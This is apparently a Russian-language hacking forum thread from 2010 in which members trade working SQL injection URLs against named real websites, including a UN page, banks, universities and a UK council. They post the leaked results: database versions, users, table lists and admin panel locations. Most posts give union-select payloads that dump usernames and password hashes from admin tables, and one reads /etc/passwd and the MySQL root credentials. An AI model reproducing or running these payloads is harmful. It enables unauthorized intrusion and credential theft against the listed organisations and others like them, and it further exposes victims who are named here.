SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Jerri

    Jerri Elder - Старейшина

    Joined:
    12 Jul 2009
    Messages:
    136
    Likes Received:
    377
    Reputations:
    22
    Code:
    http://www.rukodelie.ru/index.php?page=cart&lastid=1+union+select+1,2,concat_ws%280x3a,user%28%29,version%28%29,database%28%29,@@version_compile_os%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44
    @localhost | 5.0.26-lk-log | rukodelier | pc-linux-gnu
     
  2. Jerri

    Jerri Elder - Старейшина

    Joined:
    12 Jul 2009
    Messages:
    136
    Likes Received:
    377
    Reputations:
    22
    Code:
    http://www.un.org/sg/articleFullsearch.asp?TID=1%20or%201=%28select%20db_name%28%29%29--
    Имя базы данных : News
    Code:
    http://www.un.org/sg/articleFullsearch.asp?TID=1%20or%201=%28select%20system_user%29--
    Владелец : web
    Code:
    http://www.un.org/sg/articleFullsearch.asp?TID=1%20or%201=@@version--
    Версия : Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)

    Теперь таблицы и колонки

    Code:
    http://www.un.org/sg/articleFullsearch.asp?TID=1%20or%201=%28SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES%29--
    Одна из таблиц: failedemails
     
    #11302 Jerri, 3 Jan 2010
    Last edited by a moderator: 3 Jan 2010
  3. Stalingrad

    Stalingrad Elder - Старейшина

    Joined:
    17 Mar 2006
    Messages:
    49
    Likes Received:
    4
    Reputations:
    0
    http://www.arctic-cooling.com/webshop/index.php?shop_id=11+union+select+1,2,null--
    http://www.arctic-cooling.com/catalog/product_info.php?cPath=41_45+and+1=1--
    http://www.arctic-cooling.com/catalog/product_info.php?cPath=41_44&mID=26544+group+by+19--

    version(): 4.0.27-standard
    user(): dbo273434928@localhost
    database(): db273434928
    Также есть таблица admin (+админка http://www.arctic-cooling.com/admin)
     
    #11303 Stalingrad, 3 Jan 2010
    Last edited by a moderator: 3 Jan 2010
  4. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    5.0.81-log:shansco_shans:[email protected]:unknown-linux-gnu

    БД
    Code:
    nformation_schema@shansco_forum@shansco_shans
    таблцы
    Code:
    documents@news@news_copy@numbers@pages@poll_comment@poll_config@poll_data@poll_index@poll_ip@poll_log@poll_templates@poll_templateset@poll_user@rec_banners@rec_compact@rec_compact_tmp@rec_date@rec_firm@rec_firm_block@rec_firm_name@rec_firm_tmp@rec_private@rec_private_tmp@rec_rubric@rubrics@sav_que
    таблицы форума
    Code:
    phpbb_attach_quota@phpbb_attachments@phpbb_attachments_config@phpbb_attachments_desc@phpbb_auth_access@phpbb_banlist@phpbb_categories@phpbb_config@phpbb_confirm@phpbb_disallow@phpbb_extension_groups@phpbb_extensions@phpbb_forbidden_extensions@phpbb_forum_prune@phpbb_forums@phpbb_groups@phpbb_posts@phpbb_posts_text@phpbb_privmsgs@phpbb_privmsgs_text@phpbb_quota_limits@phpbb_ranks@phpbb_search_results@phpbb_search_wordlist@phpbb_search_wordmatch@phpbb_sessions@phpbb_sessions_keys@phpbb_smilies@phpbb_themes@phpbb_themes_name@phpbb_topics@phpbb_topics_watch@phpbb_user_group@phpbb_users@phpbb_vote_desc@phpbb_vote_results@phpbb_vote_voters@phpbb_words
    poll_user:
    Code:
    user_id@username@userpass@session@last_visit 
    poll_log
    Code:
    log_id@poll_id@option_id@timestamp@ip_addr@host@agent

    Code:
    http://shans.com.ua/index.php?m=nr&id=-6421+union+select+1,2,group_concat(concat_ws(0x3a,username,userpass,last_visit)%20separator%200x3a)+from+poll_user--+&in=60
    админка и форум соответсвенно в каталогах:
     
  5. Jerri

    Jerri Elder - Старейшина

    Joined:
    12 Jul 2009
    Messages:
    136
    Likes Received:
    377
    Reputations:
    22
    Code:
    http://www.karlson-e.ru/?page=product&dir=-1%27+and+1=1+union+select+1,2,3,4,5,6,concat_ws%280x3a,version%28%29,database%28%29,user%28%29,@@version_compile_os%29,8,9+--+
    webuser@localhost
    5.1.34-log
    karlson
    portbld-freebsd7.1
     
  6. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    Мускул 4й
    http://www.digitalflywheel.com/case.php?id=-4+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,0x3a,password)+from+users+limit+1,1
    MySQL 4.0.27-log
    users::username,password
    http://www.digitalflywheel.com/admin
     
    1 person likes this.
  7. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,185
    Likes Received:
    618
    Reputations:
    690
    Bank ))
    Code:
    http://www.fidelitybank.com.gh/management/details.php?id=-1+union+select+1,2,3,4,5,6,7--
    Database:
    Version : 4.1.22-standard-log
    User: [email protected]
    OS: pc-linux-gnu
     
    _________________________
    #11307 shell_c0de, 4 Jan 2010
    Last edited: 4 Jan 2010
    2 people like this.
  8. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    идея shell_c0de Bank ))

    concerns_stella@localhost@[email protected]

    akciaban_bank@localhost@[email protected]@unknown-linux-gnu

    Event: bank_sparhafen@localhost:5.0.37-community-nt:bank_sparhafen:Win32

    другие
    65 колонок
    inforesipps@localhost:inforesipps:4.1.25-log:portbld-freebsd6.3
     
    #11308 Strilo4ka, 4 Jan 2010
    Last edited: 4 Jan 2010
    1 person likes this.
  9. FaTRuS

    FaTRuS Elder - Старейшина

    Joined:
    28 Aug 2006
    Messages:
    94
    Likes Received:
    2
    Reputations:
    0
    http://www.ak-cent.kz/news?news_category=-1+union+select+1,2,3,4,5,6,7
    akcentk_user@localhost
    5.0.77-community
    akcentk_cms
    unknown-linux-gnu
     
  10. Micr0b

    Micr0b Elder - Старейшина

    Joined:
    14 Jan 2006
    Messages:
    223
    Likes Received:
    168
    Reputations:
    26
    Code:
    http://delemont.com.au/description.php?intProductID=71%27+and+substring%28@@version,1,1%29=%274
    http://www.moretonisland.com.au/product.php?id=67768+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
     
    #11310 Micr0b, 4 Jan 2010
    Last edited: 4 Jan 2010
  11. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    класичечкий вариант блокировался1!!
    8055@localhost:8055:5.0.77:redhat-linux-gnu1

    atto@localhost:atto_new:4.1.22-logortbld-freebsd6.2
     
    #11311 Strilo4ka, 4 Jan 2010
    Last edited: 4 Jan 2010
    2 people like this.
  12. cremator (c)

    cremator (c) Elder - Старейшина

    Joined:
    20 Jun 2008
    Messages:
    258
    Likes Received:
    72
    Reputations:
    0
    Database Version: 5.0.81-community
    Database name: murzifan_helpstudents
    User name: murzifan_murzifa@localhost

    Database Version: 4.0.15-nt
    Database name: mgounb
    User name: root@localhost
     
    #11312 cremator (c), 4 Jan 2010
    Last edited: 4 Jan 2010
    1 person likes this.
  13. Jerri

    Jerri Elder - Старейшина

    Joined:
    12 Jul 2009
    Messages:
    136
    Likes Received:
    377
    Reputations:
    22
    Code:
    http://www.kuroed.com/?id=-1+and+1=1+union+select+1,2,concat_ws(0x3a,user(),database(),version(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15+--+

    kuroed@localhost
    kuroed1db
    4.1.22-log
    portbld-freebsd6.3

    :eek:
     
    1 person likes this.
  14. Ayowa

    Ayowa Member

    Joined:
    25 Dec 2009
    Messages:
    10
    Likes Received:
    9
    Reputations:
    2
    MySQL 5:

    www.johnsoncitypress.com
    Code:
    http://www.johnsoncitypress.com/News/article.php?ID=71327'+and+1=2+union+select+1,2,3,4,5,6,7,concat_ws(0x3b,user_name,user_password),9,10,11,12,13,14,15,16,17,18,19,20,21+from+ClinchFestStore.wp_users+limit+0,1+--+
    www.sewe.com
    Code:
    http://www.sewe.com/gallery.php?id=9+and+1=2+union+select+1,2,3,4,5,6,7,group_concat%28column_name%29,9,10,11,12+from+information_schema.columns+where+table_name=0x7573657273+--+
    www.365gunspor.com
    Code:
    http://www.365gunspor.com/unluler/picture.php?id=34%29+and+1=2+union+select+1,2,group_concat%28concat_ws%280x3a,userbane,password%29%29+from+sporadmin+--+
    www.faithwriters.com
    Code:
    http://www.faithwriters.com/wc-article-editors-previous.php?id=31730%27+and+7=9+union+select+1,2,3,4,5,group_concat%28concat_ws%280x3a,username,password%29%29,7,8,9,10+from+adminpass+--+
    www.talkofnewyork.com
    Code:
    http://www.talkofnewyork.com/cool2us/cool.php?ID=396+and+1=2+union+select+1,2,3,concat_ws%280x3a,id,username,password%29,5,6,7,8+from+admin+limit+0,1+--+
    www.hoylegaming.com
    Code:
    http://www.hoylegaming.com/game.php?id=18+and+2=1+union+select+1,group_concat%28concat_ws%280x3a,username,password%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,77,88,99,20,21,22,23,24+from+admin_users+--+
    soccerladuma.mobi
    Code:
    http://soccerladuma.mobi/news.php?id=21263+and+1=2+union+select+1,2,group_concat%28concat_ws%280x3a,fullname,email,passw,status%29%29,4,5,6,7,8+from+admin--
    www.open.ac.uk
    Code:
    http://www.open.ac.uk/picetl/news/details/detail.php?itemId=496ddbbb661f5%27+and+1=2+union+select+1,2,3,4,5,6,concat_ws%28CHAR%2858,58%29,%20username,%20password%29,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+SecurityCmsUser+limit+0,1/*
    www.rockfreaks.net
    Code:
    http://www.rockfreaks.net/index.php?page=albumreviews&id=-2398+union+select+1,table_schema,3,4,5,6,7,8,9,10+from+information_schema.columns+where+table_name=CHAR%2898,95,117,115,101,114,115%29
    www.rmmedia.ru
    Code:
    http://www.rmmedia.ru/news.php?id=48+and+1=2+union+select+1,group_concat%28concat_ws%280x3a,username,password%29%29,3,4,5+from+admin_audioshare.administrators--
    www.yourlistonline.com
    Code:
    http://www.yourlistonline.com/news.php?id=29%27+and+1=2+union+select+1,2,3,group_concat%28concat_ws%280x3a,userName,password%29%29,5,6+from+a_users+--+
    www.milim.com
    Code:
    http://www.milim.com/news.php?id=100+and+1=2+union+select+1,2,3,4,5,6,group_concat%28concat_ws%280x3a,column_name%29%29,8+from+information_schema.columns+where+table_name=0x62625f7573657273+--+
    www.cloudveil.com
    Code:
    http://www.cloudveil.com/company/news.php?id=50+and+1=11+union+select+1,2,3,4,5,6,7,group_concat(table_name),9,10,11,12,13+from+information_schema.tables+--+
    www.darksidefreefly.com
    Code:
    http://www.darksidefreefly.com/news.php?id=3+and+1=2+union+select+1,2,3,4,5,group_concat%28table_name%29+from+information_schema.tables--
    www.activeodds.info
    Code:
    http://www.activeodds.info/news.php?id=5445+and+1=2+union+select+1,2,group_concat%28table_name%29,4,5+from+information_schema.tables--
    www.mikealstottfamilyfoundation.org
    Code:
    http://www.mikealstottfamilyfoundation.org/news.php?id=19%27+and+1=2+union+select+1,2,3,group_concat%28table_name%29,5,6,7,8+from+information_schema.tables+--+
    MySQL 4:

    www.cssdownunder.com
    Code:
    http://www.cssdownunder.com/site.php?id=345+and+1=2+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10+--+
    epodsolar.com
    Code:
    http://epodsolar.com/site.php?id=340+and+1=2+union+select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+
     
    2 people like this.
  15. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,185
    Likes Received:
    618
    Reputations:
    690
    Продолжаем традицию банков )
    крупный Америкосовский банк
    Code:
    http://www.mcsbnh.com/about/news.php?id=-61+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5--
    User: mcsbnhc_ensky@localhost
    Version: 4.1.22-standard
    Database: mcsbnhc_mcsb
    OS: linux-gnu
     
    _________________________
    #11315 shell_c0de, 6 Jan 2010
    Last edited: 6 Jan 2010
  16. Ligendо

    Ligendо Banned

    Joined:
    7 Jan 2010
    Messages:
    0
    Likes Received:
    3
    Reputations:
    -5
    Code:
    http://www.lamsade.dauphine.fr/members.php?id_person=-151+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15--
    Code:
    http://www.budd-marseille.fr/news.php?ID=-13+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
    Code:
    http://www.avem.fr/news.php?id=-0148+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
    4.0.25-standard-log:avemlfod:[email protected]

    Code:
    http://www.akata.fr/news.php?id=-449+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9

    4.0.26-standard-log:akatav2:[email protected]

    Code:
    http://www.lephotographe.fr/news/news.php?id=-232+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13--
    [email protected]:lephotographe:4.1.22-log
     
    3 people like this.
  17. dr.Pilulkin

    dr.Pilulkin Elder - Старейшина

    Joined:
    3 Jun 2007
    Messages:
    42
    Likes Received:
    16
    Reputations:
    0
    torreabbey@localhost:5.0.45:torreabbey
    Code:
    http://www.torre-abbey.org.uk/news.php?nID=-21+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4--
    
    db_dentuser@lxplesk223:5.0.45:dentistry_content
    Code:
    http://www.dentistry.co.uk/news/news_detail.php?id=2434+limit+0+UnIon(SelecT+1,coNcaT_wS(0x3a,uSer(),VerSion(),daTaBase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26)+--+
    
    nanoorg_news@localhost:5.0.83-log:nanoorg_news
    Code:
    http://www.nano.org.uk/news/index.php?article=-319+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
    
    council@localhost:4.1.8-nt-max-log:dev_cms
    Code:
    http://www.thurrock.gov.uk/news/content.php?page=story'+limit+0+union+select+1,2,3,binary(concat_ws(0x3a,user(),version(),database())),5,6,7,8,9,10,11,12,13,14,15,16,17,18/*&ID=3530
    
     
    1 person likes this.
  18. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://thehamsterwheel.net
    Code:
    http://thehamsterwheel.net/game-reviews.php?id=-33'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+
    http://www.theatrealive.com.au
    Code:
    http://www.theatrealive.com.au/reviews.php?id=-476+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a3a,email,firstname,lastname,pwd,user_level),12,13,14,user(),16,17,18,19,20,21,22,23,24+from+users+where+user_level=1+limit+2,1+/*+
    http://tformers.com
    Code:
    http://tformers.com/article.php?sid=-12873+union+select+1,2,3,concat_ws(0x3a3a,aid,name,email,pwd,radminsuper,user()),5,6,7,8,9,10,11,12+from+nuke_authors+where+radminsuper=1+limit+1,1+--+
    www.gamesnewsi.com
    Code:
    http://www.gamesnewsi.com/reviews.php?op=showcontent&id=-751+union+select+1,2,3,concat_ws(0x3a3a,aid,name,email,pwd,radminsuper),5,6,7,8,9,10,11,12+from+nuke_authors+where+radminsuper=1+limit+5,1+--+
    www.arscars.com
    Code:
    http://www.arscars.com/reviews.php?id=-6'+union+select+1,2,3,4,5,6,7,8,9,10,11,group_concat(table_name)+from+information_schema.tables+--+
    www.americandreamcomics.com
    Code:
    http://www.americandreamcomics.com/reviews.php?op=showcontent&id=-1105+union+select+1,2,3,concat_ws(0x3a3a,aid,name,email,pwd,radminsuper),5,6,7,8,9,10,11,12+from+nuke_authors+where+radminsuper=1+limit+0,1+--+
    www.clubfandango.co.uk
    Code:
    http://www.clubfandango.co.uk/reviews.php?id=-2198+union+select+1,2,3,column_name,5,6,7,8+from+information_schema.columns+where+table_name=0x77705F7573657273+--+
    beerdorks.com
    Code:
    http://beerdorks.com/reviews.php?rev_id=-484+union+select+1,2,concat_ws(0x3a3a,user_login,user_password),4,5,6,7,8,9,10,11,12,13+from+users+--+
    www.hollies.co.uk
    Code:
    http://www.hollies.co.uk/review/reviewindex.php?menu=-2009+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+&st=1
    benua.com.ua
    Code:
    http://benua.com.ua/reviews.php?id=-11+union+select+1,2,concat_ws(0x3a3a,login,pass,status),4+from+clients+--+
    www.e-stat.info
    Code:
    http://www.e-stat.info/?cat=-16'+union+select+1,2,3,4,group_concat(table_name),6,7,8,9+from+information_schema.tables+group+by+table_schema+--+
    www.beelingua.com
    Code:
    http://www.beelingua.com/reviews.php?id=-1+union+select+1,concat_ws(0x3a3a,id,l_user,l_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+l_admin+--+
    www.best-savings-rates.com
    Code:
    http://www.best-savings-rates.com/reviews.php?id=-4+union+select+1,2,3,4,5,6,7,concat_ws(0x3a3a,username,password),9,10,11,12+from+users+--+
    
    www.winesellersltd.com
    Code:
    http://www.winesellersltd.com/reviews.php?id=-10+union+select+concat_ws(0x3a3a,user_name,password),2,3,4,5+from+users+limit+2,10+--+
    www.the-junkyard.net
    Code:
    http://the-junkyard.net/reviews.php?action=viewreview&id=-32'+union+select+1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+users+limit+0,1+--+
    www.surclaro.com
    Code:
    http://www.surclaro.com/reviews.php?op=showcontent&id=-7+union+select+1,2,3,4,5,6,7,8,9,10,11+/*+
    www.hardwareheaven.com
    Code:
    http://www.hardwareheaven.com/reviews.php?reviewid=588&pageid=-1'+UnioN+SElect+1+from+authors+--+
    www.metalfan.nl
    Code:
    http://www.metalfan.nl/reviews.php?id=-5491+union+select+1,concat_ws(0x3a3a,user_id,username,user_password,user_level)+from+mf_users+where+user_level=5+/*+
     
    1 person likes this.
  19. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    MySQL 5.0.87-community-log
    http://pravoinvest.com.ua/firm.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,group_concat(0x0b,column_name),24+from+information_schema.columns+where+table_name=0x7573657273+--
    users::user_id,user_login,user_password,user_description,user_level
    http://pravoinvest.com.ua/firm.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,group_concat(0x0b,user_id,0x3a,user_login,0x3a,user_password),24+from+users+--
    http://pravoinvest.com.ua:2082/login/
     
  20. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    Всем прив давно мну не было.Писали нет по стате хл но все равно осмелюсь.

    Двиг HLstatsX Community Edition 1.6.5


    http://hlstatsx.eu/hlstats.php?mode=dailyawardinfo&award=-99+union+select+1,2,concat_ws(0x3a,version(), user(),database()),4--&game=css

    Version: 5.0.45-log
    User: [email protected]
    Database: hlstatsce


    Читаем : etc/passwd

    http://hlstatsx.eu/hlstats.php?mode=dailyawardinfo&award=-99+union+select+1,2,CONCAT(0x3a,LOAD_FILE(0x2F6574632F706173737764), 0x3a),4--&game=css


    с мускула root

    http://hlstatsx.eu/hlstats.php?mode=dailyawardinfo&award=-99+union+select+1,2,concat_ws(0x3a,user,password),4+from+mysql.user--&game=css


    Если что извиняйте.
     
    #11320 spherics, 8 Jan 2010
    Last edited by a moderator: 8 Jan 2010
Thread Status:
Not open for further replies.